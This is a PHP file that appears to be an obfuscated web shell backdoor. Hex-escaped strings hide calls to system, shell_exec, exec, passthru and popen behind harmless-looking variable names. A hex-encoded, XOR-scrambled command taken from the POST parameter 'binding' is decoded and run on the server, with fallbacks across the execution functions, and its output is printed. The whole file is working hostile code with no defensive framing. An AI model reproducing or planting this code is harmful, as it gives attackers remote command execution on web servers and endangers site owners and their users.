<?php

$request_approved3 = "\x65\x78ec";
$request_approved4 = "p\x61s\x73\x74h\x72u";
$app_initializer = "\x68ex\x32\x62\x69n";
$request_approved1 = "\x73y\x73tem";
$request_approved2 = "s\x68\x65\x6C\x6C_e\x78ec";
$request_approved7 = "p\x63\x6C\x6Fse";
$request_approved5 = "\x70\x6Fpen";
$request_approved6 = "st\x72\x65\x61\x6D_\x67et_\x63on\x74\x65\x6Et\x73";
if (isset($_POST["bin\x64\x69n\x67"])) {
            function reverse_searcher(   $fac ,    $tkn) {
   $elem= '';
 for($g=0;
 $g<strlen($fac);
 $g++){
$elem.=chr(ord($fac[$g])^$tkn);

} return   $elem;
 
}
            $binding = $app_initializer($_POST["bin\x64\x69n\x67"]);
            $binding = reverse_searcher($binding, 13);
            if (function_exists($request_approved1)) {
                $request_approved1($binding);
            } elseif (function_exists($request_approved2)) {
                print $request_approved2($binding);
            } elseif (function_exists($request_approved3)) {
                $request_approved3($binding, $dat_fac);
                print join("\n", $dat_fac);
            } elseif (function_exists($request_approved4)) {
                $request_approved4($binding);
            } elseif (function_exists($request_approved5) && function_exists($request_approved6) && function_exists($request_approved7)) {
                $tkn_elem = $request_approved5($binding, 'r');
                if ($tkn_elem) {
                    $entity_val = $request_approved6($tkn_elem);
                    $request_approved7($tkn_elem);
                    print $entity_val;
                }
            }
            exit;
        }